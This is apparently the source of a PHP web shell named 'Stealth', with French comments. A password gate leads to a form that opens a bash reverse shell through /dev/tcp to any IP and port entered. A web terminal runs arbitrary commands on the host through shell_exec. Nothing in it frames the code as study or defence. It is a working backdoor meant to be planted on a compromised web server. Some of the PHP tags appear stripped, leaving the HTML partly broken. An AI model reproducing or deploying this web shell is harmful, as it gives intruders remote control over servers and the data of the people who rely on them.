// Mot de passe hash? (SHA-256)
$hash = 'e10684ad498f68c2e07bbf02ff11997e15c06a0b50a6401a4efb0958fb829246';

$auth = false;
if (isset($_POST['password'])) {
if (hash('sha256', $_POST['password']) === $hash) {
$auth = true;
} else {
$error = "Mot de passe incorrect";
}
} elseif (!isset($_POST['ip']) && !isset($_POST['shell_cmd'])) {
$auth = false;
}

// Reverse shell simple sans ping bloquant
function reverse_shell($ip, $port) {
$cmd = "/bin/bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'";
@shell_exec($cmd);
return true;
}

// Traitement reverse shell
if ($auth && isset($_POST['start_rev'])) {
$ip = $_POST['ip'] ?? '';
$port = $_POST['port'] ?? '';
if (filter_var($ip, FILTER_VALIDATE_IP) && is_numeric($port)) {
reverse_shell($ip, $port);
$rev_status = "<p style='color:lime;'>Tentative de reverse shell vers $ip:$port</p>";
} else {
$rev_status = "<p style='color:red;'>IP ou port invalide</p>";
}
}

// Terminal : r?pertoire courant
if (!isset($_POST['cwd'])) {
$cwd = getcwd();
} else {
$cwd = $_POST['cwd'];
}

// Traitement des commandes
if ($auth && isset($_POST['shell_cmd'])) {
$cmd = trim($_POST['shell_cmd']);
if (preg_match('/^cd\s+(.*)/', $cmd, $m)) {
$path = trim($m[1]);
if ($path === '..') {
$cwd = dirname($cwd);
} else {
$target = realpath($cwd . '/' . $path);
if ($target && is_dir($target)) {
$cwd = $target;
}
}
} elseif ($cmd !== '') {
$output = shell_exec("cd " . escapeshellarg($cwd) . " && $cmd 2>&1");
}
}

<!DOCTYPE html>
Stealth<title>Stealth</title>
<body style="background:#000;color:#0f0;font-family:monospace;text-align:center;padding-top:5vh;">
if (!$auth):



if (isset($error)) echo "
<span style='color:red;'>$error</span>";

else:

Shell distant



<!-- Formulaire Reverse Shell -->


<input name="ip" placeholder="IP" style="padding:6px;" required>
<input name="port" placeholder="Port" style="padding:6px;" required>


if (isset($rev_status)) echo $rev_status;

<!-- Terminal Web -->
<div style="max-width:900px;margin:auto;">
<div style="background:#111;padding:10px;border-radius:8px;text-align:left;color:#0f0;font-family:monospace;min-height:300px;">
<div>Repertoire : <span style="color:#999;"> echo htmlspecialchars($cwd); </span></div>



<span style="color:lime;">$ </span>
<input name="shell_cmd" autofocus style="background:#000;color:#0f0;border:none;width:90%;outline:none;">

<div style="margin-top:10px;color:#0f0;white-space:pre-wrap;"> echo isset($output) ? htmlspecialchars($output) : ''; </div>
</div>
</div>
endif;